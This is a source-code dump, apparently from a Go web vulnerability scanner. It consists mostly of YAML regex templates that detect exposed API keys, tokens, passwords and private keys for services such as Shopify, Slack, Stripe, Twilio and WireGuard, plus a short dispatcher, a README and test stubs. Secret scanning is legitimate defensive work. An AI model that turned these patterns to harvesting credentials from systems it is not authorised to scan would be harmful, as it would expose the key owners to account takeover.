| 3 | info: 4 | name: React App Password 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/react.yml 9 | - https://create-react-app.dev/docs/adding-custom-environment-variables/ 10 | - https://stackoverflow.com/questions/48699820/how-do-i-hide-an-api-key-in-create-react-app 11 | metadata: 12 | verified: true 13 | tags: react,keys,file 14 | 15 | file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | part: body 22 | regex: 23 | - \bREACT_APP(?:_[A-Z0-9]+)*_PASS(?:\s+WORD)?\s*=\s*['"]?([^\s'"$]{6,})(?:[\s'"$]|$) 24 | # digest: 4b0a00483046022100b4791a0989f14242e6ffe187281643b8b1417e5aba7fe98f353e37dbdc2ffb6c022100c3eee981ff792f8372f7f9292d0e73e0718b69a12d6d40ba0a58dff15dc3f948:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/react/reactapp-username.yaml: -------------------------------------------------------------------------------- 1 | id: reactapp-username 2 | 3 | info: 4 | name: React App Username 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/react.yml 9 | - https://create-react-app.dev/docs/adding-custom-environment-variables/ 10 | - https://stackoverflow.com/questions/48699820/how-do-i-hide-an-api-key-in-create-react-app 11 | metadata: 12 | verified: true 13 | tags: react,keys,file 14 | 15 | file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | part: body 22 | regex: 23 | - \bREACT_APP(?:_[A-Z0-9]+)*_USER(?:\s+NAME)?\s*=\s*['"]?([^\s'"$]{3,})(?:[\s'"$]|$) 24 | # digest: 4a0a0047304502201077003a86f122901374676e5f9dfda39f6c54f870a6e4f12b7dd01707a3a5e2022100c998646fe193fa833a18772b90679efa1ba4cca48a55a2da1c839b79e50b4cfd:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/rubygems-key.yaml: -------------------------------------------------------------------------------- 1 | id: rubygems-key 2 | 3 | info: 4 | name: RubyGems API Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/rubygems.yml 9 | - https://guides.rubygems.org/rubygems-org-api/ 10 | - https://guides.rubygems.org/api-key-scopes/ 11 | metadata: 12 | verified: true 13 | tags: file,keys,rubygems,token,ruby 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - "(rubygems_[a-f0-9]{48})" 23 | # digest: 4a0a0047304502207bd78ce7b44dacf6aae4fbaa6afa5d82c7085d2cb323667240aff8b7d949cedb022100eeb152ea7c2cced5093efcfd79da8b9d80a89d1a8eb29b0ee3ed50ae61a49f15:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/s3-bucket.yaml: -------------------------------------------------------------------------------- 1 | id: s3-bucket 2 | 3 | info: 4 | name: S3 Bucket Detect 5 | author: gaurang 6 | severity: info 7 | tags: file,keys,token,bucket 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "[a-z0-9.-]+\\.s3\\.amazonaws\\.com" 16 | - "[a-z0-9.-]+\\.s3-[a-z0-9-]\\.amazonaws\\.com" 17 | - "[a-z0-9.-]+\\.s3-website[.-](eu|ap|us|ca|sa|cn)" 18 | - "//s3\\.amazonaws\\.com/[a-z0-9._-]+" 19 | - "//s3-[a-z0-9-]+\\.amazonaws\\.com/[a-z0-9._-]+" 20 | # digest: 4a0a00473045022100c3ed21e6ff1fb637d42e18ec4636575c7df1069d9e355656d5f77ddb3a8fc8d7022027fc3fa8178e359af3509cc94dc1bf96cade6095d69409c4f521ef0175b091aa:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/salesforce/salesforce-access.yaml: -------------------------------------------------------------------------------- 1 | id: salesforce-access 2 | 3 | info: 4 | name: Salesforce Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/salesforce.yml 9 | metadata: 10 | verified: true 11 | tags: salesforce,keys,file 12 | 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - \b(00[a-zA-Z0-9]{13}![a-zA-Z0-9._]{96})(?:\b|$|[^a-zA-Z0-9._]) 22 | # digest: 490a0046304402207a4efb9c2401eaa2ebf49fcc5ec4676dfc142a5f5d607777827383c94bf144f102207b75489de473e1c5e3264e2d664fbb87cecbfc5811b20e6ac658fcd3f1415806:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/sauce-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: sauce-access-token 2 | 3 | info: 4 | name: Sauce Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/sauce.yml 9 | metadata: 10 | verified: true 11 | tags: file,keys,sauce,token 12 | file: 13 | - extensions: 14 | - all 15 | 16 | extractors: 17 | - type: regex 18 | part: body 19 | regex: 20 | - '(?i)sauce.{0,50}\b([a-f0-9-]{36})\b' 21 | # digest: 490a00463044022009ca563154c28786be32017d641fca7d37b8615cd7054e15823cff495a98bba3022066116c3e58abf5f5091e8f649632b0a9768878dee3a7ea572eedac7adcdefdd6:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/segment-public-api.yaml: -------------------------------------------------------------------------------- 1 | id: segment-public-api 2 | 3 | info: 4 | name: Segment Public API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/segment.yml 9 | - https://segment.com/docs/api/public-api/ 10 | - https://segment.com/blog/how-segment-proactively-protects-customer-api-tokens/ 11 | metadata: 12 | verified: true 13 | tags: keys,file,segment,token 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - '(sgp_[a-zA-Z0-9]{64})' 23 | # digest: 4a0a0047304502202853fa0be0aad155b1bf710601dcb5443ebc8151a5852ae0e2c70357f8106f7c022100ab93a75342e2a408aa930452457c8bd908f297beb34396cf97af7ed89e76cf38:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/sendgrid-api.yaml: -------------------------------------------------------------------------------- 1 | id: sendgrid-api-key-file 2 | 3 | info: 4 | name: Sendgrid API Key 5 | author: gaurang 6 | severity: high 7 | tags: keys,file,token,sendgrid 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "SG\\.[a-zA-Z0-9]{22}\\.[a-zA-Z0-9]{43}" 16 | # digest: 4b0a00483046022100d3c8e8d194bf1de6ea48f9c0ed47cf49cc66a5f44195732b29617199ae5a360b022100d00c1fa924b6444959e020764b71559bc85f140c3c912d76e0fc6c35abe161d9:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/shopify-custom-token.yaml: -------------------------------------------------------------------------------- 1 | id: shopify-custom-token 2 | 3 | info: 4 | name: Shopify Custom App Access Token 5 | author: gaurang 6 | severity: high 7 | tags: file,keys,token 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "shpca_[a-fA-F0-9]{32}" 16 | # digest: 4a0a00473045022034a27b39b96e56d6c5c5f0bb8437e6760ba81fa31281a386906e8eaea515bca9022100b8c26487144b3cc4e78cfd69fc39a62fe1eab148e86bcd6101a5beeb2ec3015e:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/shopify-private-token.yaml: -------------------------------------------------------------------------------- 1 | id: shopify-private-token 2 | 3 | info: 4 | name: Shopify Private App Access Token 5 | author: gaurang 6 | severity: high 7 | tags: file,keys,token 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "shppa_[a-fA-F0-9]{32}" 16 | # digest: 4b0a004830460221008a9fcfd1953cd27472015171cc2ff718e69112124812210ea6ba818da8c0de17022100a5dd54d3323017b989e594baf393a6915d32c96622b2be024cfad826b8a9d773:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/shopify-public-access.yaml: -------------------------------------------------------------------------------- 1 | id: shopify-public-access 2 | 3 | info: 4 | name: Shopify Access Token (Public App) 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/shopify.yml 9 | - https://shopify.dev/apps/auth 10 | - https://shopify.dev/changelog/app-secret-key-length-has-increased 11 | metadata: 12 | verified: true 13 | tags: file,keys,shopify,token 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - '\b(shpat_[a-fA-F0-9]{32})\b' 23 | # digest: 4a0a00473045022056ae9c25283c7b064051f029d5dba8a224e83494727342a07f6ac9e97c7d96ad02210094d395337ca85abb5d825cab42781d3a2091f59355519823e9b7ec7994b8bd70:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/shopify-shared-secret.yaml: -------------------------------------------------------------------------------- 1 | id: shopify-shared-secret 2 | 3 | info: 4 | name: Shopify Shared Secret 5 | author: gaurang 6 | severity: high 7 | tags: file,keys,token 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "shpss_[a-fA-F0-9]{32}" 16 | # digest: 4a0a00473045022070a5f8b18d6bfa572f7903f81f2f46a542b0e08c7dd5a822be8d79ded225a81e022100f75c2fa4f6a9aa7217aab9cf51b808d6008d492b2f8230650519227e95d98050:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/shopify-token.yaml: -------------------------------------------------------------------------------- 1 | id: shopify-access-token 2 | 3 | info: 4 | name: Shopify Access Token 5 | author: gaurang 6 | severity: high 7 | tags: file,keys,token 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "shpat_[a-fA-F0-9]{32}" 16 | # digest: 4a0a0047304502200b41777dd82b3d396f4d76d75a526b7f5f863f8f1d2b4e313990480c398917ef022100810ddcd217e57655538d9153e898ad34e32c9b3179aceac031fbaf698de6ecc4:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/slack-api.yaml: -------------------------------------------------------------------------------- 1 | id: slack-api 2 | 3 | info: 4 | name: Slack API Key 5 | author: gaurang 6 | severity: high 7 | tags: file,keys,token,slack 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "xox[baprs]-([0-9a-zA-Z]{10,48})?" 16 | # digest: 4a0a004730450220098e1929b6ec4c0b3e189cebf5142b7ee75dfd23c8c9303e1a9b43f25e00c94b02210094541a8012719eec9a5b6fb643a3ef4050a67ef02165ba3eb94120d6458fb5c7:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/slack-webhook.yaml: -------------------------------------------------------------------------------- 1 | id: slack-webhook 2 | 3 | info: 4 | name: Slack Webhook 5 | author: gaurang 6 | severity: high 7 | tags: file,keys,token,slack 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "https://hooks.slack.com/services/T[0-9A-Za-z\\-_]{8}/B[0-9A-Za-z\\-_]{8}/[0-9A-Za-z\\-_]{24}" 16 | # digest: 490a00463044022030754b3461d730219fc7c4e9ce0b08cb582a6842e1161dd92551d5c86bde1a88022070d798d9356477fdda4e122fe64f5b6f981b7db9d85596b65e8e49b20f2dc657:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/square-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: square-access-token 2 | 3 | info: 4 | name: Square Access Token 5 | author: gaurang,daffainfo 6 | severity: high 7 | tags: file,keys,token,square 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "EAAAE[a-zA-Z0-9_-]{59}" 16 | - "sq0atp-[0-9A-Za-z\\-_]{22}" 17 | # digest: 490a00463044022016fc50e7940f4fb9d85db1563b7e86d644facdd66f530692b600d6cb0c4d3438022050fff84340f9f8afe3efbaeb9063ebc13bb5f4df8c13f328258d07ee43cc1998:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/square-oauth-secret.yaml: -------------------------------------------------------------------------------- 1 | id: square-oauth-secret 2 | 3 | info: 4 | name: Square OAuth Secret 5 | author: gaurang 6 | severity: high 7 | tags: file,keys,token,square 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "sq0csp-[0-9A-Za-z\\-_]{43}" 16 | # digest: 4b0a00483046022100b9d713ce6825a6aa6f3a38bb156f20588d72be414cdb570f0946f7dda4c809c7022100ab886a6c8e1afb2b271507fc2fe390137235ad84e1de02247de49ee5a86e3cfa:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/stackhawk-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: stackhawk-api-key 2 | 3 | info: 4 | name: StackHawk API Key 5 | author: hazana 6 | severity: medium 7 | reference: 8 | - https://docs.stackhawk.com/apidocs.html 9 | metadata: 10 | verified: true 11 | tags: file,keys,token 12 | file: 13 | - extensions: 14 | - all 15 | 16 | extractors: 17 | - type: regex 18 | regex: 19 | - "hawk\\.[0-9A-Za-z\\-_]{20}\\.[0-9A-Za-z\\-_]{20}" 20 | # digest: 4a0a0047304502210097611c22dad431694acb1a7b7233bb23042461df6249cc72c417adf3d005f1250220257f95a6d89864ee22c1465cbd0bffb16a05aa4f28787ec0d65a7407d3258166:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/stripe-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: stripe-api-key 2 | 3 | info: 4 | name: Stripe API Key 5 | author: gaurang 6 | severity: high 7 | tags: file,keys,token,stripe 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "(?i)stripe(.{0,20})?[sr]k_live_[0-9a-zA-Z]{24}" 16 | # digest: 4a0a00473045022100dcb13029ebf479d6aca563b1f1955ac0498c974f35af12006c2f9ebbb45c66770220286512d9e87b5923252c2c4fbb86ee621c42a66ec40ef13cd70937292e099cfa:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/telegram-token.yaml: -------------------------------------------------------------------------------- 1 | id: telegram-token 2 | 3 | info: 4 | name: Telegram Bot Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/telegram.yml 9 | - https://core.telegram.org/bots/api 10 | - https://core.telegram.org/bots/features#botfather 11 | metadata: 12 | verified: true 13 | tags: file,keys,telegram,token 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - '\b(\d+:AA[a-zA-Z0-9_-]{32,33})' 23 | # digest: 4a0a0047304502200d5ed3c8bfb5e36d8156b70f6307bdd05abdf92a55e6d486eac1ec3c88de967f022100fcd85801f37c8f52fa00d37262a861f0deec088f50d750da360932ff8ba21515:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/thingsboard/thingsboard-access.yaml: -------------------------------------------------------------------------------- 1 | id: thingsboard-access 2 | 3 | info: 4 | name: ThingsBoard Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/thingsboard.yml 9 | - https://thingsboard.io/docs/paas/reference/http-api/ 10 | - https://thingsboard.io/docs/paas/reference/coap-api/ 11 | metadata: 12 | verified: true 13 | tags: thingsboard,keys,file 14 | 15 | file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | part: body 22 | regex: 23 | - thingsboard\.cloud/api/v1/([a-z0-9]{20}) 24 | # digest: 4b0a00483046022100e85330533e34d275242ad231bb436951116dabe56acafa94f3db46fca45ed3ae022100a799502b27b8e16f77e8406be58127578dd5f3465dab8b0a2381ee944432c239:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/twilio-api.yaml: -------------------------------------------------------------------------------- 1 | id: twilio-api 2 | 3 | info: 4 | name: Twilio API Key 5 | author: gaurang 6 | severity: high 7 | tags: file,keys,token 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}" 16 | # digest: 4b0a004830460221009edd6055d2937d438ddc5a460cb57ceaf448ee273900a3a2ff9d217329cbaf170221009df1b8754959e50ef0155608d8ea98f45e87c59221868f7ad7a762ba88ba28fc:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/twitter/twitter-client.yaml: -------------------------------------------------------------------------------- 1 | id: twitter-client 2 | 3 | info: 4 | name: Twitter Client ID 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/twitter.yml 9 | - https://developer.twitter.com/en/docs/authentication/overview 10 | metadata: 11 | verified: true 12 | tags: twitter,keys,file 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)\btwitter.?(?:api|app|application|client|consumer|customer)?.?(?:id|identifier|key).{0,2}\s{0,20}.{0,2}\s{0,20}.{0,2}\b([a-z0-9]{18,25})\b 23 | # digest: 4a0a00473045022030cb9bb226fc38ff17accc2fbe89603cae16c35050ec725ad20ce14d5fbc5ad2022100860577843f28d261d7fbf35ef59577e5fd0e84a50eb370cfbd714f1039338c19:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/twitter/twitter-secret.yaml: -------------------------------------------------------------------------------- 1 | id: twitter-secret 2 | 3 | info: 4 | name: Twitter Secret Key 5 | author: DhiyaneshDK,gaurang,daffainfo 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/twitter.yml 9 | - https://developer.twitter.com/en/docs/authentication/overview 10 | metadata: 11 | verified: true 12 | tags: twitter,keys,file 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)twitter.?(?:api|app|application|client|consumer|customer|secret|key).?(?:key|oauth|sec|secret)?.{0,2}\s{0,20}.{0,2}\s{0,20}.{0,2}\b([a-z0-9]{35,44})\b 23 | # digest: 4a0a00473045022100ae8d7dcc6d380f9b0ba6d16ca558e7af6254078b3f1a0a2230f8ddc28f47267102206348551061cffebd4da2b42ec393373ef0987eeeb4382f0e517c38c836fb46cf:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/wireguard/wireguard-preshared.yaml: -------------------------------------------------------------------------------- 1 | id: wireguard-preshared 2 | 3 | info: 4 | name: WireGuard Preshared Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/wireguard.yml 9 | - https://www.wireguard.com/quickstart/ 10 | - https://manpages.debian.org/testing/wireguard-tools/wg.8.en.html 11 | - https://gist.github.com/lanceliao/5d2977f417f34dda0e3d63ac7e217fd 12 | metadata: 13 | verified: true 14 | tags: wireguard,keys,file 15 | 16 | file: 17 | - extensions: 18 | - all 19 | 20 | extractors: 21 | - type: regex 22 | part: body 23 | regex: 24 | - PresharedKey\s*=\s*([A-Za-z0-9+/]{43}=) 25 | # digest: 4a0a00473045022055b7809c89c44f01db811de03d659329878fabbb6006f65a5cfc4c231e72b5ce022100916852a09714e7cf50f5e239c48dba2b243d889df28c54c7671cb3b0ec8dc9e5:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/wireguard/wireguard-private.yaml: -------------------------------------------------------------------------------- 1 | id: wireguard-private 2 | 3 | info: 4 | name: WireGuard Private Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/wireguard.yml 9 | - https://www.wireguard.com/quickstart/ 10 | - https://manpages.debian.org/testing/wireguard-tools/wg.8.en.html 11 | - https://gist.github.com/lanceliao/5d2977f417f34dda0e3d63ac7e217fd 12 | metadata: 13 | verified: true 14 | tags: wireguard,keys,file 15 | 16 | file: 17 | - extensions: 18 | - all 19 | 20 | extractors: 21 | - type: regex 22 | part: body 23 | regex: 24 | - PrivateKey\s*=\s*([A-Za-z0-9+/]{43}=) 25 | # digest: 4a0a004730450221008bd7fd7c9c74eb3c6d2f1d5e4c8cc9c0fcc230534b094814ee0ca7dff2f7f9800220688ed7ae288880609a373ea69defa1d5ed93ca3fcb312e5c4ea2acea46b2e27c:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/zapier-webhook.yaml: -------------------------------------------------------------------------------- 1 | id: zapier-webhook 2 | 3 | info: 4 | name: Zapier Webhook 5 | author: Devang-Solanki 6 | severity: high 7 | reference: 8 | - https://github.com/streaak/keyhacks#Zapier-Webhook-Token 9 | - https://docs.gitguardian.com/secrets-detection/detectors/specifics/zapier_webhook_url 10 | tags: file,keys,token,zapier 11 | file: 12 | - extensions: 13 | - all 14 | 15 | extractors: 16 | - type: regex 17 | regex: 18 | - 'https://(?:www.)?hooks\.zapier\.com/hooks/catch/[A-Za-z0-9]+/[A-Za-z0-9]+/' 19 | # digest: 4a0a004730450221009177769af7a8468ea644e7787fa6c35c65b057e8ad3b35b6d27e064a3763add30220734af477f469387822e7570ce196e8907ac3d4bb13b77be3d6b432944fce1e4a:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/zendesk-secret-key.yaml: -------------------------------------------------------------------------------- 1 | id: zendesk-secret-key 2 | 3 | info: 4 | name: Zendesk Secret Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/zendesk-secret-key.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/zendesk-secret-key.go 10 | metadata: 11 | verified: true 12 | tags: zendesk,file,keys 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:zendesk)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | 23 | # digest: 4a0a00473045022100ee6bae1cf90faa1beeae922204d58b2300e6ca7bf92065cb8a8402c597a1739002202c8bb2ae82d2e6c109dce0cce6fcb9d17f9f2977b098e1710dbdb8aafd92b8cd:922c64590222798bb761d5b6d8e72950 24 | -------------------------------------------------------------------------------- /scan/gadget/sensitive/sensitive.go: -------------------------------------------------------------------------------- 1 | package sensitive 2 | 3 | /** 4 | @author: yhy 5 | @since: 2023/10/18 6 | @desc: //TODO 7 | **/ 8 | 9 | // Detection 页面敏感信息检测 10 | func Detection(url, req, body string) { 11 | go KeyDetection(url, body) 12 | go PageErrorMessageCheck(url, req, body) 13 | go Wih(url, req, body) 14 | } 15 | -------------------------------------------------------------------------------- /scan/gadget/sensitive/sensitive.md: -------------------------------------------------------------------------------- 1 | ## 敏感信息检测 2 | 3 | ~~使用[secrets-patterns-db](https://github.com/mazen160/secrets-patterns-db/)规则~~ 4 | 5 | 误报过多,使用 nuclei[https://github.com/projectdiscovery/nuclei-templates/tree/main/file/keys] ,从中提取相关正则 6 | 7 | 检测流程 8 | ```bash 9 | 无头浏览器爬虫扫描获取body -> 使用规则正则匹配 10 | ``` 11 | 12 | ## TODO 13 | 上报过多,需要优化 -------------------------------------------------------------------------------- /scan/gadget/swagger/swagger_test.go: -------------------------------------------------------------------------------- 1 | package swagger 2 | 3 | import ( 4 | "fmt" 5 | "github.com/yhy0/Jie/pkg/output" 6 | "sync" 7 | "testing" 8 | ) 9 | 10 | /** 11 | @author: yhy 12 | @since: 2023/1/4 13 | @desc: //TODO 14 | **/ 15 | 16 | func TestSwagger(t *testing.T) { 17 | // 使用 sync.WaitGroup 防止 OutChannel 中的数据没有完全被消费,导致的数据漏掉问题 18 | var wg sync.WaitGroup 19 | wg.Add(1) 20 | go func() { 21 | wg.Done() 22 | for v := range output.OutChannel { 23 | fmt.Println(v.PrintScreen()) 24 | } 25 | }() 26 | 27 | Scan("", "") 28 | 29 | wg.Wait() 30 | } 31 | -------------------------------------------------------------------------------- /scan/type.go: -------------------------------------------------------------------------------- 1 | package scan 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/input" 5 | "github.com/yhy0/Jie/pkg/protocols/httpx" 6 | ) 7 | 8 | /** 9 | @author yhy 10 | @since 2023/10/13 11 | @desc //TODO 12 | **/ 13 | 14 | // Addon 插件接口 15 | type Addon interface { 16 | Scan(target string, path string, in *input.CrawlResult, client *httpx.Client) // 扫描, target\path 扫描目标单独传入,不从 in 中获取,这样就不用修改 in 中的 url 导致出现错误 17 | IsScanned(uniqueId string) bool // 是否已经扫描过 18 | Name() string // 插件名称 19 | } 20 | -------------------------------------------------------------------------------- /test/cdncheck_test.go: -------------------------------------------------------------------------------- 1 | package test 2 | 3 | import ( 4 | "fmt" 5 | "github.com/yhy0/Jie/pkg/util" 6 | "testing" 7 | ) 8 | 9 | func TestCDNCheckValid(t *testing.T) { 10 | 11 | found, provider, itemType, dnsData := util.CheckCdn("173.245.48.12") 12 | 13 | fmt.Println(found) 14 | fmt.Println(provider) 15 | fmt.Println(itemType) 16 | if dnsData != nil { 17 | fmt.Println(dnsData.A) 18 | } 19 | 20 | fmt.Println("=================") 21 | found, provider, itemType, dnsData = util.CheckCdn("www.baidu.com") 22 | 23 | fmt.Println(found) 24 | fmt.Println(provider) 25 | fmt.Println(itemType) 26 | if dnsData != nil { 27 | fmt.Println(dnsData.A) 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /test/crawler_test.go: -------------------------------------------------------------------------------- 1 | package test 2 | 3 | import ( 4 | "testing" 5 | ) 6 | 7 | /** 8 | @author yhy 9 | @since 2023/8/22 10 | @desc //TODO 11 | **/ 12 | 13 | func TestCrawler(t *testing.T) { 14 | 15 | } 16 | -------------------------------------------------------------------------------- /test/jsluice_test.go: -------------------------------------------------------------------------------- 1 | package test 2 | 3 | import ( 4 | "encoding/json" 5 | "fmt" 6 | "github.com/BishopFox/jsluice" 7 | "testing" 8 | ) 9 | 10 | /** 11 | @author yhy 12 | @since 2023/12/26 13 | @desc //TODO 14 | **/ 15 | 16 | func TestJsluice(t *testing.T) { 17 | analyzer := jsluice.NewAnalyzer([]byte(` 18 | const login = (redirect) => { 19 | document.location = "/login?redirect=" + redirect + "&method=oauth" 20 | } 21 | `)) 22 | 23 | for _, url := range analyzer.GetURLs() { 24 | fmt.Println(url.URL) 25 | j, err := json.MarshalIndent(url, "", " ") 26 | if err != nil { 27 | continue 28 | } 29 | fmt.Printf("%s\n", j) 30 | } 31 | } 32 | --------------------------------------------------------------------------------